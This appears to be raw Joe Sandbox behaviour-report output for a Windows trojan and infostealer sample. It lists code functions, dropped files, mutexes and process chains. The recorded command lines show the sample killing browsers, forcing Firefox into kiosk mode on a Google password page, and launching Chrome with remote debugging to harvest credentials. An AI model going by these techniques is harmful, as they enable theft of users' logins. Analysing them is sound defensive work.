Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041FE62	8_2_0041FE62
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043D660	8_2_0043D660
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040EE05	8_2_0040EE05
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00423610	8_2_00423610
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042861A	8_2_0042861A
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041BE20	8_2_0041BE20
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042AE26	8_2_0042AE26
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00406630	8_2_00406630
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00402EF0	8_2_00402EF0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00418683	8_2_00418683
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042B5B7	8_2_0042B5B7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00423E90	8_2_00423E90
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00434F60	8_2_00434F60
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00427769	8_2_00427769
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041CF00	8_2_0041CF00
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00409710	8_2_00409710
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00422F22	8_2_00422F22
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00416F3C	8_2_00416F3C
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00425FC0	8_2_00425FC0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004167DC	8_2_004167DC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004257E0	8_2_004257E0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00413FF0	8_2_00413FF0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041E7F0	8_2_0041E7F0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00435780	8_2_00435780
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004397A0	8_2_004397A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042F7B2	8_2_0042F7B2
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00438FB0	8_2_00438FB0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004387B0	8_2_004387B0
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FD8060	9_2_00FD8060
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01042046	9_2_01042046
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01038298	9_2_01038298
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0100E4FF	9_2_0100E4FF
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0100676B	9_2_0100676B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01064873	9_2_01064873
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FDCAF0	9_2_00FDCAF0
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FFCAA0	9_2_00FFCAA0
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FECC39	9_2_00FECC39
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01006DD9	9_2_01006DD9
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FD91C0	9_2_00FD91C0
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FEB119	9_2_00FEB119
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF1394	9_2_00FF1394
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF1706	9_2_00FF1706
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF781B	9_2_00FF781B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF19B0	9_2_00FF19B0
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FE997D	9_2_00FE997D
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FD7920	9_2_00FD7920
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF7A4A	9_2_00FF7A4A
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF7CA7	9_2_00FF7CA7
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF1C77	9_2_00FF1C77
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0105BE44	9_2_0105BE44
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF1F32	9_2_00FF1F32
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01009EEE	9_2_01009EEE

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: String function: 00FEF9F2 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: String function: 00FF0A30 appears 46 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00EE80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: String function: 000251F0 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: String function: 0002970F appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: String function: 00413FE0 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: String function: 00407F30 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00F380C0 appears 130 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9968175238419619
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9968175238419619
Source: PK13K1G[1].exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003418814991334
Source: PK13K1G.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003418814991334
Source: random[1].exe.5.dr	Static PE information: Section: vdtghsqu ZLIB complexity 0.9948693422716454
Source: acdee533dd.exe.5.dr	Static PE information: Section: vknblbix ZLIB complexity 0.9946503918022905
Source: random[2].exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[2].exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: fe1ffe1825.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: fe1ffe1825.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@116/34@153/22

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_010437B5 GetLastError,FormatMessageW,

9_2_010437B5

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_010310BF AdjustTokenPrivileges,CloseHandle,		9_2_010310BF
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_010316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		9_2_010316C3

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_010451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

9_2_010451CD

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103D4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

9_2_0103D4DC

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 8_2_00435A80 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

8_2_00435A80

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

9_2_00FD42A2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PK13K1G[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp, acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: acdee533dd.exe, 0000001A.00000003.2780047378.0000000005B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: acdee533dd.exe, 0000001A.00000002.3102550716.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3109774596.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	Virustotal: Detection: 54%
Source: file.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117609fd-4f26-4a60-a0be-f2f21ea52b9b} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1323d16ff10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4212 -parentBuildID 20230927232528 -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3addc31c-4409-4228-89b4-cd724dc8ae4f} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1324d872210 rdd
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe "C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2296,i,4526499487474445861,3926510125965509157,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
